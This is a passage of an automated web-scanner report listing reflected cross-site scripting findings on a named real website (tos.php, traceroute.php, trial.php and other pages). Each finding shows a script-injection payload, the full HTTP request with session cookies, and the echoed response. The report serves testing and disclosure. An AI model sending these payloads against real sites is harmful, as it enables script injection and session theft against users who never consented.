Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5b9361dfcf10b43866dbdd49520b19c3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en3d077"><script>alert(1)</script>63f0196ca1/tos.php" method="post">
...[SNIP]...

1.227. http://www.watchmouse.com/en/tos.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/tos.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a6ef"><script>alert(1)</script>100b5b603eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/tos.php6a6ef"><script>alert(1)</script>100b5b603eb HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f155f4d3201de5f3565439d306f7ba67"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/tos.php6a6ef"><script>alert(1)</script>100b5b603eb" method="post">
...[SNIP]...

1.228. http://www.watchmouse.com/en/tos.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b498e"><script>alert(1)</script>1c103de8a87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/tos.php?b498e"><script>alert(1)</script>1c103de8a87=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d5b4606118c0ab85a13a9aa8de3f356f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/tos.php?b498e"><script>alert(1)</script>1c103de8a87=1" method="post">
...[SNIP]...

1.229. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/traceroute.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5937"><script>alert(1)</script>798b3afc68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ena5937"><script>alert(1)</script>798b3afc68f/traceroute.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8e8eee740e1f5d9043d961b7955ba936"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ena5937"><script>alert(1)</script>798b3afc68f/traceroute.php" method="post">
...[SNIP]...

1.230. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/traceroute.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97784"><script>alert(1)</script>1b33f12dfc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/traceroute.php97784"><script>alert(1)</script>1b33f12dfc7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8d664836a98a69cd1f2902360c30a205"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/traceroute.php97784"><script>alert(1)</script>1b33f12dfc7" method="post">
...[SNIP]...

1.231. http://www.watchmouse.com/en/traceroute.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/traceroute.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd126"><script>alert(1)</script>7ed75527df8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/traceroute.php?bd126"><script>alert(1)</script>7ed75527df8=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-7c39474f7a9e6a5c143544e00d65cbee"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/traceroute.php?bd126"><script>alert(1)</script>7ed75527df8=1" method="post">
...[SNIP]...

1.232. http://www.watchmouse.com/en/trial.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/trial.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ee1f"><script>alert(1)</script>c4f8fd7a77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9ee1f"><script>alert(1)</script>c4f8fd7a77/trial.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b26a3ebd922738c95c5fa02747267300"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9ee1f"><script>alert(1)</script>c4f8fd7a77/trial.php" method="post">
...[SNIP]...

1.233. http://www.watchmouse.com/en/trial.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/trial.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a67c4"><script>alert(1)</script>de71c530b36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/trial.phpa67c4"><script>alert(1)</script>de71c530b36 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9726f34eac231d9c8cf608d7fb5ff888"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/trial.phpa67c4"><script>alert(1)</script>de71c530b36" method="post">
...[SNIP]...

1.234. http://www.watchmouse.com/en/trial.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/trial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80035"><script>alert(1)</script>3fe5ce1010e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en/trial.php?80035"><script>alert(1)</script>3fe5ce1010e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-64696b75aa61c3586b2908839e32d72c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<a href="/nl/register.php?vpackid=35&80035"><script>alert(1)</script>3fe5ce1010e=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.235. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/website_monitoring_features.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d07f9"><script>alert(1)</script>fdd5fc632fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /end07f9"><script>alert(1)</script>fdd5fc632fb/website_monitoring_features.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b762b5a2672422c95cb79b9354845edc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/end07f9"><script>alert(1)</script>fdd5fc632fb/website_monitoring_features.php" method="post">
...[SNIP]...

1.236. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/website_monitoring_features.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4c9"><script>alert(1)</script>2dee22711b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/website_monitoring_features.php4d4c9"><script>alert(1)</script>2dee22711b7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-24d89a88213296573e3c88f3622f22c7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/website_monitoring_features.php4d4c9"><script>alert(1)</script>2dee22711b7" method="post">
...[SNIP]...

1.237. http://www.watchmouse.com/en/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/website_monitoring_features.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0866"><script>alert(1)</script>fe36ffcfa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/website_monitoring_features.php?d0866"><script>alert(1)</script>fe36ffcfa4=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b3775c05e35f70796f4c0188c85f92b2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/website_monitoring_features.php?d0866"><script>alert(1)</script>fe36ffcfa4=1" method="post">
...[SNIP]...

1.238. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/worldwide.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc509"><script>alert(1)</script>d40910ae5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /endc509"><script>alert(1)</script>d40910ae5f1/worldwide.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-202383e959579cead3e041f627fe4998"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/endc509"><script>alert(1)</script>d40910ae5f1/worldwide.php" method="post">
...[SNIP]...

1.239. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/worldwide.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e070"><script>alert(1)</script>8f9c1b74449 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/worldwide.php3e070"><script>alert(1)</script>8f9c1b74449 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-56e0a2d65b22e9dda7f1ab797f7388fd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/worldwide.php3e070"><script>alert(1)</script>8f9c1b74449" method="post">
...[SNIP]...

1.240. http://www.watchmouse.com/en/worldwide.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/worldwide.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bde"><script>alert(1)</script>c330fe7c84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/worldwide.php?41bde"><script>alert(1)</script>c330fe7c84e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
